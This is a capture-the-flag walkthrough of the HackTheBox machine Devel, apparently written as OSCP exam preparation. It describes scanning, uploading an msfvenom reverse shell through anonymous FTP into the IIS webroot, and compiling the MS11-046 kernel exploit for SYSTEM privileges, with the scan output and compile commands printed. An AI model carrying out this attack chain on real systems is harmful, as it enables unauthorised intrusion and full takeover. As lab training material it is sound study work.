TJnull OSCP Prep Series
HackTheBox: Devel [OSCP Prep]

HackTheBox: Devel [OSCP Prep]


  • OS: Windows 💠
  • Difficulty: Easy 😇
  • Release: 15 Mar 2017 📅
  • IP: 10.10.10.5 💻
  • Box Creator: ch4p 😎

Hello there guys. Welcome to my 6th post on the TJnull OSCP Prep Series. Today we’re going to be discussing Devel from HackTheBox.

Let’s begin with a full Nmap scan port scan to see what open ports we can find. I’ve used Rustscan because it provides faster Nmap results:

$ rustscan -a 10.10.10.5 -r 1-65535 -- -sV -sC -Pn
PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    syn-ack Microsoft IIS httpd 7.5
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 23:05
Completed NSE at 23:05, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 23:05
Completed NSE at 23:05, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 23:05
Completed NSE at 23:05, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.97 seconds

I started with FTP cause we have anonymous access. We see some files in the FTP server that are not really useful to us.

Figure 1.0

Ok, let’s keep the FTP server aside and move on to the HTTP server (port 80) enumeration. Doing a quick dirbust we can identify some files that exactly match the files we found on the FTP server. This made me think the FTP server might infact be the webroot of the webserver. This means we can upload files and execute them via the webserver.

Create a quick shell with msfvenom

Figure 1.2

Upload to FTP server

Figure 1.3

Trigger the shell

Figure 1.4 : Execute the shell we uploaded via the HTTP server

Get a shell reverse connection.

Figure 1.5

Post Exploitation

The first thing I do in privsec is to check if the target system is vulnerable to some sought of kernel exploits, cause that’s an easy win.

C:\Windows\TEMP> systeminfo
Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          babis
Registered Organization:   
Product ID:                55041-051-0948536-86302
Original Install Date:     17/3/2017, 4:17:31 ��
System Boot Time:          17/10/2021, 7:37:15 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     3.071 MB
Available Physical Memory: 2.453 MB
Virtual Memory: Max Size:  6.141 MB
Virtual Memory: Available: 5.526 MB
Virtual Memory: In Use:    615 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Local Area Connection 3
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.5
                                 [02]: fe80::58c0:f1cf:abc6:bb9e
                                 [03]: dead:beef::1fc

We see that that the

  • OS name => Microsoft Windows 7
  • OS version => Build 7600

By using this information we might be able to search for public privsec exploits. I used Google in this case but you can use windows-exploit-suggester, watson.

Figure 1.6 : <OS name> <OS Version> privilege esculation

The target seems to be vulnerable to MS11-046. You can check out the MS11-046 exploit here. It looks like we have to compile it before transferring it to out target. BTW, the compilation details are provided in the exploit source code so that’s cool.

$ sudo apt-get install mingw-w64
$ i686-w64-mingw32-gcc MS11-046.c -o MS11-046.exe -lws2_32

Now we can transfer it to our target.

Figure 1.7 : Upload MS11-046 compiled binary to target

Execute it

Figure 1.8

Now we have system access to our target.


I hope you have learned something valuable by reading my write-up. If you like this post please share it with your fellow hackermates and if you have any questions & suggestions please feel free to post them down in the comments. I’d love to hear and learn from you.

If you enjoyed this write-up show me some ❤️ by giving me some respect 💯 at [email protected] which helps & motivates me to create content like this for the awesome hacking community. Have a great day guys 👋. See you in the next post.

Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments